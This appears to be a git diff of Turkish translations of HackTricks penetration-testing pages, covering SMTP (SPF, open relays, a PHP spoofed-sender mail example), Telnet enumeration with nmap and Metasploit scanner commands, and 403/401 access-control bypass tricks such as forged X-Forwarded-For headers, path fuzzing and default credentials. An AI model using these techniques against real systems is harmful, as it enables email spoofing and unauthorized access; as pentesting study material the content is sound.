| adkim | DKIM için hizalama modu | adkim=s |
| aspf | SPF için hizalama modu | aspf=r |
### **Alt Alanlar Ne Olacak?**
### **Alt Alan Adları Ne Olacak?**
**Buradan** [**buraya**](https://serverfault.com/questions/322949/do-spf-records-for-primary-domain-apply-to-subdomains)**.**\
Mail göndermek istediğiniz her alt alan için ayrı SPF kayıtlarına sahip olmalısınız.\
Aşağıdaki bilgi, bu tür şeyler için harika bir kaynak olan openspf.org'da ilk olarak yayınlanmıştır.
> Demon Sorusu: Alt alanlar ne olacak?
> Demon Sorusu: Alt alan adları ne olacak?
>
> Eğer pielovers.demon.co.uk adresinden mail alıyorsam ve pielovers için SPF verisi yoksa, bir seviye geri gidip demon.co.uk için SPF'yi test etmeli miyim? Hayır. Demon'daki her alt alan farklı bir müşteridir ve her müşterinin kendi politikası olabilir. Demon's politikası varsayılan olarak tüm müşterilerine uygulanamaz; eğer Demon bunu yapmak istiyorsa, her alt alan için SPF kayıtları oluşturabilir.
> Eğer pielovers.demon.co.uk adresinden mail alıyorsam ve pielovers için SPF verisi yoksa, bir seviye geri gidip demon.co.uk için SPF'yi test etmeli miyim? Hayır. Demon'daki her alt alan farklı bir müşteridir ve her müşterinin kendi politikası olabilir. Demon's politikası varsayılan olarak tüm müşterilerine uygulanması mantıklı olmaz; eğer Demon bunu istiyorsa, her alt alan için SPF kayıtları oluşturabilir.
>
> Bu nedenle SPF yayıncılarına tavsiye şudur: A veya MX kaydı olan her alt alan veya ana bilgisayar için bir SPF kaydı eklemelisiniz.
>
@ -377,13 +381,13 @@ Bu mantıklıdır - bir alt alan çok farklı bir coğrafi konumda olabilir ve
### **Açık İletim**
E-postalar gönderildiğinde, spam olarak işaretlenmemelerini sağlamak çok önemlidir. Bu genellikle **alıcı tarafından güvenilen bir iletim sunucusu** kullanılarak sağlanır. Ancak, yaygın bir zorluk, yöneticilerin hangi **IP aralıklarının güvenli olduğunu tam olarak bilmemesidir**. Bu anlayış eksikliği, SMTP sunucusunun kurulumu sırasında hatalara yol açabilir ve bu, güvenlik değerlendirmelerinde sıkça tespit edilen bir risktir.
E-postalar gönderildiğinde, spam olarak işaretlenmemelerini sağlamak çok önemlidir. Bu genellikle **alıcı tarafından güvenilen bir iletim sunucusu** kullanılarak sağlanır. Ancak, yaygın bir zorluk, yöneticilerin hangi **IP aralıklarının güvenli olduğunu tam olarak bilmemesidir**. Bu anlayış eksikliği, SMTP sunucusunun kurulumu sırasında hatalara yol açabilir; bu, güvenlik değerlendirmelerinde sıkça tespit edilen bir risktir.
Bazı yöneticilerin, özellikle potansiyel veya devam eden müşterilerle iletişimde e-posta teslimat sorunlarından kaçınmak için kullandığı bir çözüm, **herhangi bir IP adresinden bağlantılara izin vermektir**. Bu, SMTP sunucusunun `mynetworks` parametresinin tüm IP adreslerini kabul edecek şekilde yapılandırılmasıyla yapılır, aşağıda gösterildiği gibi:
Bazı yöneticilerin, özellikle potansiyel veya devam eden müşterilerle iletişimde e-posta teslimat sorunlarını önlemek için kullandığı bir geçici çözüm, **herhangi bir IP adresinden bağlantılara izin vermektir**. Bu, SMTP sunucusunun `mynetworks` parametresinin tüm IP adreslerini kabul edecek şekilde yapılandırılmasıyla yapılır, aşağıda gösterildiği gibi:
```bash
mynetworks = 0.0.0.0/0
```
Bir mail sunucusunun açık bir relay olup olmadığını kontrol etmek için (bu, dış kaynaklardan e-posta iletebileceği anlamına gelir), `nmap` aracı yaygın olarak kullanılır. Bu testi yapmak için tasarlanmış özel bir script içerir. `nmap` kullanarak 25 numaralı portta bir sunucuda (örneğin, IP 10.10.10.10 ile) ayrıntılı bir tarama gerçekleştirmek için komut:
Bir mail sunucusunun açık bir relay olup olmadığını kontrol etmek için (bu, herhangi bir dış kaynaktan e-posta iletebileceği anlamına gelir), `nmap` aracı yaygın olarak kullanılır. Bu testi yapmak için tasarlanmış özel bir script içerir. `nmap` kullanarak 25 numaralı portta bir sunucuda (örneğin, IP 10.10.10.10 ile) ayrıntılı bir tarama gerçekleştirmek için komut:
```bash
nmap -p25 --script smtp-open-relay 10.10.10.10 -v
```
@ -434,7 +438,7 @@ K9B7U1w0CJFUk6+4Qutr2ROqKtNOff9KuNRLAOiAzH3ZbQ==
{% tabs %}
{% tab title="PHP" %}
<pre class="language-php"><code class="lang-php"><strong># Bu, imzasız bir mesaj gönderecektir
</strong><strong>mail("your_email@gmail.com", "Test Subject!", "hey! Bu bir test", "From: administrator@victim.com");
</strong><strong>mail("your_email@gmail.com", "Test Subject!", "hey! This is a test", "From: administrator@victim.com");
</strong></code></pre>
{% endtab %}
@ -506,13 +510,13 @@ s.sendmail(sender, [destination], msg_data)
* Alan adının yaşı
* IP adreslerine işaret eden bağlantılar
* Bağlantı manipülasyon teknikleri
* Şüpheli (olağan dışı) ekler
* Şüpheli (olağandışı) ekler
* Bozuk e-posta içeriği
* E-posta başlıklarından farklı olan kullanılan değerler
* Geçerli ve güvenilir bir SSL sertifikasının varlığı
* Sayfanın web içerik filtreleme sitelerine gönderilmesi
## SMTP Üzerinden Exfiltrasyon
## SMTP üzerinden dışa aktarma
**Eğer verileri SMTP üzerinden gönderebiliyorsanız** [**bunu okuyun**](../../generic-methodologies-and-resources/exfiltration.md#smtp)**.**
@ -520,7 +524,7 @@ s.sendmail(sender, [destination], msg_data)
### Postfix
Genellikle, eğer kuruluysa, `/etc/postfix/master.cf` dosyası, örneğin bir kullanıcı tarafından yeni bir e-posta alındığında **çalıştırılacak betikleri** içerir. Örneğin `flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}` satırı, kullanıcı mark tarafından yeni bir e-posta alındığında `/etc/postfix/filtering` dosyasının çalıştırılacağını belirtir.
Genellikle, eğer kuruluysa, `/etc/postfix/master.cf` dosyası, örneğin bir kullanıcı tarafından yeni bir e-posta alındığında **çalıştırılacak betikleri** içerir. Örneğin `flags=Rq user=mark argv=/etc/postfix/filtering-f ${sender} -- ${recipient}` satırı, kullanıcı mark tarafından yeni bir e-posta alındığında `/etc/postfix/filtering`'in çalıştırılacağını belirtir.
Diğer konfigürasyon dosyaları:
```
@ -583,7 +587,7 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_version; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_ntlm_domain; set RHOSTS {IP}; set RPORT 25; run; exit' && msfconsole -q -x 'use auxiliary/scanner/smtp/smtp_relay; set RHOSTS {IP}; set RPORT 25; run; exit'
```
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
@ -598,7 +602,7 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
<summary>HackTricks'i Destekleyin</summary>
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** bizi takip edin.**
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'ı takip edin.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
</details>

View file

@ -9,15 +9,15 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
<summary>HackTricks'i Destekleyin</summary>
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** bizi takip edin.**
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter**'da **bizi takip edin** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell açmaları ve eğlenmeleri için zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell açmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -54,7 +54,7 @@ AUTH komutu ile istemci kendini sunucuya kimlik doğrulaması yapar, kullanıcı
Devam eden e-posta iletiminin sonlandırılacağını sunucuya bildirir, ancak SMTP konuşması kapatılmaz (QUIT durumunda olduğu gibi).
**EXPN**\
Bu SMTP komutu, bir posta listesinin tanımlanması hakkında onay ister.
Bu SMTP komutu, bir posta listesinin tanımlanması hakkında bir onay talep eder.
**HELP**\
Bu, e-postanın başarılı bir şekilde iletimi için faydalı olabilecek bazı bilgileri istemcinin talebidir.
@ -62,9 +62,9 @@ Bu, e-postanın başarılı bir şekilde iletimi için faydalı olabilecek bazı
**QUIT**\
SMTP konuşmasını sonlandırır.
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell açmaları ve eğlenmeleri için zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell açmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -77,7 +77,7 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
<summary>HackTricks'i Destekleyin</summary>
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** bizi takip edin.**
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter**'da **bizi takip edin** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
</details>

View file

@ -1,29 +1,29 @@
# 23 - Pentesting Telnet
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>HackTricks'i Destekleyin</summary>
<summary>Support HackTricks</summary>
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'i takip edin.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell açmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell açmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
## **Temel Bilgiler**
Telnet, kullanıcılara bir ağ üzerinden bir bilgisayara erişim sağlamak için güvensiz bir yol sunan bir ağ protokolüdür.
Telnet, kullanıcıların bir ağ üzerinden bir bilgisayara güvensiz bir şekilde erişim sağlamasına olanak tanıyan bir ağ protokolüdür.
**Varsayılan port:** 23
```
@ -41,7 +41,7 @@ nmap -n -sV -Pn --script "*telnet* and safe" -p 23 <IP>
```
`telnet-ntlm-info.nse` betiği NTLM bilgilerini (Windows sürümleri) alacaktır.
[telnet RFC](https://datatracker.ietf.org/doc/html/rfc854)'den: TELNET Protokolünde, bir kullanıcının ve sunucunun TELNET bağlantıları için daha ayrıntılı (veya belki sadece farklı) bir dizi kural kullanmayı kabul etmesine olanak tanıyan çeşitli "**seçenekler**" bulunmaktadır. Bu seçenekler karakter setini değiştirmek, yankı modunu değiştirmek vb. içerebilir.
[telnet RFC](https://datatracker.ietf.org/doc/html/rfc854)'den: TELNET Protokolünde, bir kullanıcının ve sunucunun TELNET bağlantıları için daha ayrıntılı (veya belki sadece farklı) bir dizi kural kullanmayı kabul etmesine olanak tanımak için "**DO, DON'T, WILL, WON'T**" yapısıyla kullanılabilecek çeşitli "**seçenekler**" bulunmaktadır. Bu seçenekler karakter setini değiştirmek, yankı modunu değiştirmek vb. içerebilir.
**Bu seçenekleri sıralamanın mümkün olduğunu biliyorum ama nasıl yapıldığını bilmiyorum, eğer biliyorsanız lütfen bana bildirin.**
@ -85,9 +85,9 @@ Note: sourced from https://github.com/carlospolop/legion
Command: msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_version; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/brocade_enable_login; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_encrypt_overflow; set RHOSTS {IP}; set RPORT 23; run; exit' && msfconsole -q -x 'use auxiliary/scanner/telnet/telnet_ruggedcom; set RHOSTS {IP}; set RPORT 23; run; exit'
```
<figure><img src="/.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; keşiften raporlamaya kadar. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

View file

@ -1,4 +1,4 @@
# 403 & 401 Bypass'ları
# 403 & 401 Bypass'leri
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
@ -15,9 +15,9 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Güvenlik açığı değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. Recon'dan raporlamaya kadar 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}
@ -25,15 +25,15 @@ GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" a
Dosyaya erişmek için **farklı fiiller** kullanmayı deneyin: `GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK`
* Yanıt başlıklarını kontrol edin, belki bazı bilgiler verilebilir. Örneğin, `Content-Length: 55` ile **HEAD** için **200 yanıtı**, **HEAD fiilinin bilgiye erişebileceği** anlamına gelir. Ancak, bu bilgiyi dışarıya aktarmanın bir yolunu bulmanız gerekir.
* Yanıt başlıklarını kontrol edin, belki bazı bilgiler verilebilir. Örneğin, `Content-Length: 55` ile **HEAD** için **200 yanıtı**, **HEAD fiilinin bilgiyi erişebileceği** anlamına gelir. Ancak, bu bilgiyi dışarı çıkarmanın bir yolunu bulmanız gerekir.
* `X-HTTP-Method-Override: PUT` gibi bir HTTP başlığı kullanmak, kullanılan fiili geçersiz kılabilir.
* **`TRACE`** fiilini kullanın ve çok şanslıysanız belki yanıtınızda, yararlı olabilecek **ara proxy'ler tarafından eklenen başlıkları** görebilirsiniz.
* **`TRACE`** fiilini kullanın ve çok şanslıysanız, belki yanıtınızda **ara proxy'ler tarafından eklenen başlıkları** görebilirsiniz, bu da faydalı olabilir.
## HTTP Başlıkları Fuzzing
* **Host başlığını** rastgele bir değere değiştirin ([burada işe yaradı](https://medium.com/@sechunter/exploiting-admin-panel-like-a-boss-fc2dd2499d31))
* Kaynağa erişmek için [**diğer Kullanıcı Ajanlarını**](https://github.com/danielmiessler/SecLists/blob/master/Fuzzing/User-Agents/UserAgents.fuzz.txt) kullanmayı deneyin.
* **HTTP Başlıklarını Fuzzing**: HTTP Proxy **Başlıkları**, HTTP Kimlik Doğrulama Temel ve NTLM brute-force (sadece birkaç kombinasyon ile) ve diğer teknikleri deneyin. Bunu yapmak için [**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass) aracını oluşturdum.
* **HTTP Başlıklarını Fuzzing**: HTTP Proxy **Başlıkları**, HTTP Kimlik Doğrulama Temel ve NTLM brute-force (sadece birkaç kombinasyon ile) ve diğer teknikleri kullanmayı deneyin. Bunu yapmak için [**fuzzhttpbypass**](https://github.com/carlospolop/fuzzhttpbypass) aracını oluşturdum.
* `X-Originating-IP: 127.0.0.1`
* `X-Forwarded-For: 127.0.0.1`
@ -53,9 +53,9 @@ Eğer **yol korunuyorsa**, bu diğer başlıkları kullanarak yol korumasını a
* `X-Original-URL: /admin/console`
* `X-Rewrite-URL: /admin/console`
* Eğer sayfa **bir proxy'nin arkasındaysa**, belki de proxy, özel bilgilere erişmenizi engelliyordur. [**HTTP İstek Kaçırma**](../../pentesting-web/http-request-smuggling/) **veya** [**hop-by-hop başlıklarını**](../../pentesting-web/abusing-hop-by-hop-headers.md)** kötüye kullanmayı deneyin.**
* Farklı yanıtlar aramak için [**özel HTTP başlıklarını**](special-http-headers.md) fuzzlayın.
* **HTTP Yöntemlerini** fuzzlarken **özel HTTP başlıklarını** fuzzlayın.
* Eğer sayfa **bir proxy'nin arkasındaysa**, belki de proxy, özel bilgilere erişmenizi engelliyordur. [**HTTP İstek Kaçırma**](../../pentesting-web/http-request-smuggling/) **veya** [**hop-by-hop başlıkları**](../../pentesting-web/abusing-hop-by-hop-headers.md)** istismar etmeyi deneyin.**
* Farklı yanıtlar aramak için [**özel HTTP başlıklarını**](special-http-headers.md) fuzzing yapın.
* **HTTP Yöntemlerini** fuzzing yaparken **özel HTTP başlıklarını** fuzzing yapın.
* **Host başlığını kaldırın** ve belki de korumayı aşabileceksiniz.
## Yol **Fuzzing**
@ -63,8 +63,8 @@ Eğer **yol korunuyorsa**, bu diğer başlıkları kullanarak yol korumasını a
Eğer _/path_ engellenmişse:
* _**/**_**%2e/path _kullanmayı deneyin (eğer erişim bir proxy tarafından engelleniyorsa, bu korumayı aşabilir). Ayrıca**\_\*\* /%252e\*\*/path (çift URL kodlaması) deneyin.
* **Unicode bypass** deneyin: _/**%ef%bc%8f**path_ (URL kodlu karakterler "/" gibidir) böylece geri kodlandığında _//path_ olacak ve belki de _/path_ adı kontrolünü zaten aşmış olacaksınız.
* **Diğer yol bypass'ları**:
* **Unicode bypass** deneyin: _/**%ef%bc%8f**path_ (URL kodlu karakterler "/" gibidir) bu nedenle geri kodlandığında _//path_ olacak ve belki de _/path_ adı kontrolünü aşmış olacaksınız.
* **Diğer yol bypass'leri**:
* site.com/secret > HTTP 403 Yasak
* site.com/SECRET > HTTP 200 Tamam
* site.com/secret/ > HTTP 200 Tamam
@ -79,7 +79,7 @@ Eğer _/path_ engellenmişse:
* /FUZZsecret
* /FUZZ/secret
* /secretFUZZ
* **Diğer API bypass'ları:**
* **Diğer API bypass'leri:**
* /v3/users\_data/1234 --> 403 Yasak
* /v1/users\_data/1234 --> 200 Tamam
* {“id”:111} --> 401 Yetkisiz
@ -102,16 +102,16 @@ Eğer _/path_ engellenmişse:
HTTP/1.1 kullanıyorsanız **1.0 kullanmayı deneyin** veya **2.0'ı destekleyip desteklemediğini test edin**.
## **Diğer Bypass'lar**
## **Diğer Bypass'ler**
* Alan adının **IP** veya **CNAME**'sini alın ve **doğrudan iletişim kurmayı deneyin**.
* **Sunucuyu zorlayın** yaygın GET istekleri göndererek ([Bu adam için Facebook'ta işe yaradı](https://medium.com/@amineaboud/story-of-a-weird-vulnerability-i-found-on-facebook-fc0875eb5125)).
* **Protokolü değiştirin**: http'den https'ye veya https'den http'ye.
* **Protokolü değiştirin**: http'den https'ye veya https'den http'ye
* [**https://archive.org/web/**](https://archive.org/web/) adresine gidin ve geçmişte o dosyanın **dünya çapında erişilebilir olup olmadığını** kontrol edin.
## **Brute Force**
* **Şifreyi tahmin edin**: Aşağıdaki yaygın kimlik bilgilerini test edin. Kurban hakkında bir şey biliyor musunuz? Ya da CTF meydan okuma adı?
* **Şifreyi tahmin edin**: Aşağıdaki yaygın kimlik bilgilerini test edin. Kurban hakkında bir şey biliyor musunuz? Ya da CTF meydan okuma adını mı?
* [**Brute force**](../../generic-methodologies-and-resources/brute-force.md#http-brute)**:** Temel, digest ve NTLM kimlik doğrulamasını deneyin.
{% code title="Yaygın kimlik bilgileri" %}
@ -132,13 +132,13 @@ guest guest
* [https://github.com/lobuhi/byp4xx](https://github.com/lobuhi/byp4xx)
* [https://github.com/iamj0ker/bypass-403](https://github.com/iamj0ker/bypass-403)
* [https://github.com/gotr00t0day/forbiddenpass](https://github.com/gotr00t0day/forbiddenpass)
* [Burp Extension - 403 Bypasser](https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122)
* [Burp Eklentisi - 403 Bypass](https://portswigger.net/bappstore/444407b96d9c4de0adb7aed89e826122)
* [Forbidden Buster](https://github.com/Sn1r/Forbidden-Buster)
* [NoMoreForbidden](https://github.com/akinerk/NoMoreForbidden)
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; keşiften raporlamaya kadar. Pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
{% embed url="https://pentest-tools.com/?utm_term=jul2024&utm_medium=link&utm_source=hacktricks&utm_campaign=spons" %}

View file

@ -15,7 +15,7 @@ Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-s
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (14) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/pentest-tools.svg" alt=""><figcaption></figcaption></figure>
**Zafiyet değerlendirmesi ve penetrasyon testi için anında kullanılabilir kurulum**. 20'den fazla araç ve özellik ile her yerden tam bir pentest gerçekleştirin; bu araçlar keşiften raporlamaya kadar uzanır. Biz pentester'ların yerini almıyoruz - onlara daha derinlemesine araştırma yapmaları, shell'leri patlatmaları ve eğlenmeleri için biraz zaman kazandırmak amacıyla özel araçlar, tespit ve istismar modülleri geliştiriyoruz.
@ -34,19 +34,19 @@ proxy_pass http://127.0.0.1:8080/;
}
}
```
